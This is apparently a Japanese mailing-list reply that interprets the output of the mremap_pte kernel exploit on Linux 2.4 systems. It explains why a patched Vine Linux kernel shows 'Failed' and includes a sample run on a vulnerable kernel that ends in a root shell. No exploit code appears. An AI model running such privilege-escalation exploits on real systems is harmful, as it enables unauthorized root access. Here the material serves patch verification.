> 上記コードのコメントにあるようにコンパイルした上で、
> $ ./mremap_pte
> …した結果は、
>
> [+] kernel 2.4.22-0vl2.11 vulnerable: YES exploitable YES
> MMAP #65530 0x50bfa000 - 0x50bfb000
> [-] Failed
>
> …となります。
check_kver で kernel のバージョンを調べ,2.4.x の場合,2.4.19 から
2.4.24 ならば vulnerable: YES exploitable YES と表示するように
なっています.ただし 2.4.22-0vl2.11 はパッチがあたっているので
(バージョン番号は 2.4.22 ですが) exploitable ではありません.上の結果で
[-] Failed となっています.
# これで合っていると思いますが,見落としがあったらすみません.
本当に exploitable の場合は次のように root 権限の shell になります.
% id
uid=1000(makoto) gid=100(users) 所属グループ=100(users)
% ./mremap_pte
[+] kernel 2.4.20-0vl29.1 vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[+] Success
[root@xxxxxxxx tmp]# id
uid=0(root) gid=0(root) 所属グループ=100(users)
[root@xxxxxxxx tmp]#